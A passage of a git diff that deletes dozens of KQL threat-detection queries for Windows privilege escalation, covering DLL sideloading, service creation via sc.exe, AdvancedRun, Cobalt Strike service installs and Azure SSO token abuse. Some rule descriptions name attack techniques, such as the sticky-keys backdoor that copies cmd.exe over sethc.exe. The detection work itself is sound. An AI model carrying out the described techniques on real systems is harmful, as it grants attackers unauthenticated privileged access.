"\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql b/Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql deleted file mode 100644 index 7fba55a2..00000000 --- a/Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/10/01 -// Level: high -// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup -// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.001 -DeviceRegistryEvents -| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup" \ No newline at end of file diff --git a/Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql b/Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql deleted file mode 100644 index 1dbdb0cb..00000000 --- a/Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/14 -// Level: medium -// Description: Detects creation of a new service (kernel driver) with the type "kernel" -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe" \ No newline at end of file diff --git a/Privilege Escalation/New_Service_Creation_Using_PowerShell.kql b/Privilege Escalation/New_Service_Creation_Using_PowerShell.kql deleted file mode 100644 index ce9fb3fa..00000000 --- a/Privilege Escalation/New_Service_Creation_Using_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community -// Date: 2023/02/20 -// Level: low -// Description: Detects the creation of a new service using powershell. -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName" \ No newline at end of file diff --git a/Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql b/Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql deleted file mode 100644 index dd56c1e4..00000000 --- a/Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community -// Date: 2023/02/20 -// Level: low -// Description: Detects the creation of a new service using the "sc.exe" utility. -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe" \ No newline at end of file diff --git a/Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql b/Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql deleted file mode 100644 index ef12160b..00000000 --- a/Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2022/06/19 -// Level: high -// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. -Adversaries may abuse time providers to execute DLLs when the system boots. -The Windows Time service (W32Time) enables time synchronization across and within domains. - -// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.003 -DeviceRegistryEvents -| where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL")))) \ No newline at end of file diff --git a/Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql b/Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql deleted file mode 100644 index 67f96f11..00000000 --- a/Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/21 -// Level: high -// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system -// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029 -DeviceFileEvents -| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-" \ No newline at end of file diff --git a/Privilege Escalation/PUA_-_AdvancedRun_Execution.kql b/Privilege Escalation/PUA_-_AdvancedRun_Execution.kql deleted file mode 100644 index 4e6050fc..00000000 --- a/Privilege Escalation/PUA_-_AdvancedRun_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/20 -// Level: medium -// Description: Detects the execution of AdvancedRun utility -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ") \ No newline at end of file diff --git a/Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql b/Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql deleted file mode 100644 index c00dd12f..00000000 --- a/Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/20 -// Level: high -// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1134.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11")) \ No newline at end of file diff --git a/Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql b/Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql deleted file mode 100644 index 1282a6c6..00000000 --- a/Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/02 -// Level: high -// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) -// Tags: attack.execution, attack.privilege_escalation, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe") \ No newline at end of file diff --git a/Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql deleted file mode 100644 index 5662813f..00000000 --- a/Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Shelton (HAWK.IO) -// Date: 2021/12/09 -// Level: medium -// Description: Detects a when net.exe is called with a password in the command line -// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078 -DeviceProcessEvents -| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " ")) \ No newline at end of file diff --git a/Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql b/Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql deleted file mode 100644 index 0e968bc4..00000000 --- a/Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bartlomiej Czyz @bczyz1, oscd.community -// Date: 2020/10/11 -// Level: medium -// Description: Detects value modification of registry key containing path to binary used as screensaver. -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.002 -DeviceRegistryEvents -| where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql b/Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql deleted file mode 100644 index 17643f89..00000000 --- a/Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Sreeman -// Date: 2020/02/18 -// Level: critical -// Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. -When the sticky keys are "activated" the privilleged shell is launched. - -// Tags: attack.t1546.008, attack.privilege_escalation -DeviceProcessEvents -| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "/y " and ProcessCommandLine contains "C:\\windows\\system32\\cmd.exe C:\\windows\\system32\\sethc.exe" \ No newline at end of file diff --git a/Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql b/Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql deleted file mode 100644 index 8867fa02..00000000 --- a/Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov -// Date: 2019/10/26 -// Level: high -// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (FolderPath endswith "\\sc.exe" and ProcessIntegrityLevel =~ "Medium") and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_7za.DLL_Sideloading.kql b/Privilege Escalation/Potential_7za.DLL_Sideloading.kql deleted file mode 100644 index f1cc961b..00000000 --- a/Privilege Escalation/Potential_7za.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/06/09 -// Level: low -// Description: Detects potential DLL sideloading of "7za.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql b/Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql deleted file mode 100644 index e192e978..00000000 --- a/Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/08/03 -// Level: medium -// Description: Detects potential DLL sideloading of "AVKkid.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql b/Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql deleted file mode 100644 index 000b03f0..00000000 --- a/Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\log.dll" and (not(((FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\")))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql b/Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql deleted file mode 100644 index 49da9307..00000000 --- a/Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Den Iuzvyk -// Date: 2020/07/15 -// Level: low -// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. -An attacker can use this to authenticate to Azure AD in a browser as that user. - -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql b/Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql deleted file mode 100644 index 1c5d0f3d..00000000 --- a/Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/13 -// Level: medium -// Description: Detects potential DLL sideloading of "CCleanerDU.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql b/Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql deleted file mode 100644 index 7d335d90..00000000 --- a/Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/07/13 -// Level: medium -// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql b/Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql deleted file mode 100644 index 4ca5d408..00000000 --- a/Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql b/Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql deleted file mode 100644 index e448ad48..00000000 --- a/Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Wojciech Lesicki -// Date: 2021/06/29 -// Level: high -// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. - -// Tags: attack.execution, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1543.003, attack.t1569.002 -DeviceRegistryEvents -| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql b/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql deleted file mode 100644 index 7d53df8f..00000000 --- a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/10/25 -// Level: medium -// Description: Detects DLL sideloading of "dbgcore.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql b/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql deleted file mode 100644 index 85e52e34..00000000 --- a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/10/25 -// Level: medium -// Description: Detects DLL sideloading of "dbghelp.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql b/Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql deleted file mode 100644 index bafb67b9..00000000 --- a/Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/05 -// Level: medium -// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql b/Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql deleted file mode 100644 index d6f4a3c3..00000000 --- a/Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/13 -// Level: medium -// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql b/Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql deleted file mode 100644 index 4d8a43ae..00000000 --- a/Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/14 -// Level: medium -// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql b/Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql deleted file mode 100644 index 05e33118..00000000 --- a/Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash) -// Date: 2022/12/16 -// Level: high -// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\") \ No newline at end of file diff --git a/Privilege Escalation/Potential_EACore.DLL_Sideloading.kql b/Privilege Escalation/Potential_EACore.DLL_Sideloading.kql deleted file mode 100644 index f843422e..00000000 --- a/Privilege Escalation/Potential_EACore.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/08/03 -// Level: high -// Description: Detects potential DLL sideloading of "EACore.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql b/Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql deleted file mode 100644 index fa643858..00000000 --- a/Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/09 -// Level: high -// Description: Detects potential DLL sideloading of "edputil.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql b/Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql deleted file mode 100644 index 27f1e8dc..00000000 --- a/Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/15 -// Level: medium -// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files 